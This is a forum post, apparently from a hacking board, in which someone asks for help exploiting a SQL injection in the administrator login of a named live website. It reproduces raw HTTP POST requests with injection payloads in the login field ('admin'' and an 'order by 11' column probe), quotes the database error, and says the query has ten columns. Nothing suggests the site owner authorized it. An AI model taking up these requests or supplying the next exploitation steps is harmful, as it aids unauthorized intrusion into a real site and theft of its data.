Hi all
please help to exploit sqli
response is
I check for exploit with error-based vector, but can not
and when doing
response is Unknown column '11' in 'order clause'
there is 10 columns
but i don't know how to expolit then
thanks !
please help to exploit sqli
POST /adminiztrator.php HTTP/1.1
Host: escortahmedabad.info
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
Content-Type: multipart/form-data; boundary=---------------------------2276829840405
Content-Length: 359
Cookie: PHPSESSID=1nold7pifrllhsa5gpjtkoqtg6
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------2276829840405
Content-Disposition: form-data; name="action"
login
-----------------------------2276829840405
Content-Disposition: form-data; name="login"
admin'
-----------------------------2276829840405
Content-Disposition: form-data; name="password"
a
-----------------------------2276829840405--
Host: escortahmedabad.info
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
Ссылка скрыта от гостей
Content-Type: multipart/form-data; boundary=---------------------------2276829840405
Content-Length: 359
Cookie: PHPSESSID=1nold7pifrllhsa5gpjtkoqtg6
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------2276829840405
Content-Disposition: form-data; name="action"
login
-----------------------------2276829840405
Content-Disposition: form-data; name="login"
admin'
-----------------------------2276829840405
Content-Disposition: form-data; name="password"
a
-----------------------------2276829840405--
I check for exploit with error-based vector, but can not
and when doing
POST /adminiztrator.php HTTP/1.1
Host: escortahmedabad.info
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
Content-Type: multipart/form-data; boundary=---------------------------2276829840405
Content-Length: 356
Cookie: PHPSESSID=1nold7pifrllhsa5gpjtkoqtg6
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------2276829840405
Content-Disposition: form-data; name="action"
login
-----------------------------2276829840405
Content-Disposition: form-data; name="login"
a' order by 11-- -
-----------------------------2276829840405
Content-Disposition: form-data; name="password"
a
-----------------------------2276829840405--
Host: escortahmedabad.info
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
Ссылка скрыта от гостей
Content-Type: multipart/form-data; boundary=---------------------------2276829840405
Content-Length: 356
Cookie: PHPSESSID=1nold7pifrllhsa5gpjtkoqtg6
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------2276829840405
Content-Disposition: form-data; name="action"
login
-----------------------------2276829840405
Content-Disposition: form-data; name="login"
a' order by 11-- -
-----------------------------2276829840405
Content-Disposition: form-data; name="password"
a
-----------------------------2276829840405--
there is 10 columns
but i don't know how to expolit then
thanks !
